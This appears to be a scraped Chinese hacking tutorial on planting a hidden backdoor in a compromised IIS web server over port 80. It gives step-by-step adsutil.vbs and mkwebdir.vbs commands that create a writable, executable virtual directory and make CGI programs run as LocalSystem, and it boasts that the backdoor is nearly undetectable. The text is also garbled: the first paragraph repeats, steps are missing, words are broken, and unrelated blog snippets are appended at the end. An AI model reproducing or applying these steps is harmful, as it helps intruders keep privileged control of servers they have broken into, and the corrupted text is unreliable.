iis是比較流行的www伺服器,設定不當漏洞就很多。入侵iis伺服器後留下後門,以後就可以隨時控制。一般的後門程式都是開啟乙個特殊的埠來監聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在伺服器端監聽遠端的連線控制。
iis是比較流行的www伺服器,設定不當漏洞就很多。入侵iis伺服器後留下後門,以後就可以隨時控制。一般的後門程式都是開啟乙個特殊的埠來監聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在伺服器端監聽遠端的連線控制。不過乙個比較防範嚴密的www站點(他們的管理員吃了苦頭後)一般通過防火牆對埠進行限制,這樣除了管理員開的埠外,其他埠就不能連線了。但是80埠是不可能關閉的(如果管理員沒有吃錯藥)。那麼我們可以通過在80埠留後門,來開啟永遠的後門。
當iis啟動cgi應用程式時,預設用createprocessasuser api來建立該cgi的新process,該程式的安全上下文就由啟動該cgi的使用者決定。一般匿名使用者都對映到iusr_computername這個賬號,當然可以由管理員改為其他的使用者。或者由瀏覽器提供乙個合法的使用者。兩者的使用者的許可權都是比較低,可能都屬於guest組的成員。其實我們可以修改iis開啟cgi的方式,來提高許可權。我們來看iis主程序本身是執行在localsystem賬號下的,所以我們就可以得到最高localsystem的許可權。
入侵web伺服器後,一般都可以繫結乙個cmd到乙個埠來遠端控制該伺服器。這時可以有gui的遠端控制,比如338array,或者類telnet text方式的控制,比如rnc。nc肯定是可以用的,其實這也足夠了。
1. telnet到伺服器
[/w3svc/1/root/_vti_bin]不要告訴我你不知道上面的輸出是什麼!!!!
現在我們心裡已經有底了,是不是!呵呵 管理員要倒霉了
3. mkdir c:\inetpub\wwwroot\dir1
4. cs cript.exe mkwebdir.vbs -c mycomputer -w "default web site" -v "virtual dir1","c:\inetpub\wwwroot\dir1"
你可以用 1 的命令看一下
5. 接下來要改變一下virtual dir1的屬性為execute
cs cript.exe adsutil.vbs set w3svc/1/root/virtual dir1/accesswrite "true" -s:
cs cript.exe adsutil.vbs set w3svc/1/root/virtual dir1/acces***ecute "true" -s:
6. 以下命令通過修改iis metabase 來迫使iis以本身的安全環境來建立新的cgi process
cs cript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false注釋:cs cript windows s cript host.
adsutil.vbs windows iis administration s cript
這樣的後門幾乎是無法查出來的,除非把所有的虛目錄察看一遍(如果管理員寫好了遺書,那他就去查吧)
大家不可以用來做非法的攻擊,一切後果自負
一位真正的好人卻永遠走了
最早發表於 2008 年11月 15日下午,我突然接到 jim的 他說,kerry 有件事要告訴你,這次從國內回到美國,總覺得有點不舒服,去醫院檢查後,被診斷為胰腺癌,比蘋果公司 steven jobs 還要嚴重 震驚,我足足幾分鐘無言以對,也不知說什麼好,我只能用蒼白無力的語言來安慰他,說 美國的...
域滲透的金之鑰匙
mickey 2015 10 13 11 33 最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的 發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,還有...
域滲透的金之鑰匙
0x00 廢話連篇 最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的 發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,還有龍哥翻譯的 不知道還有什麼新...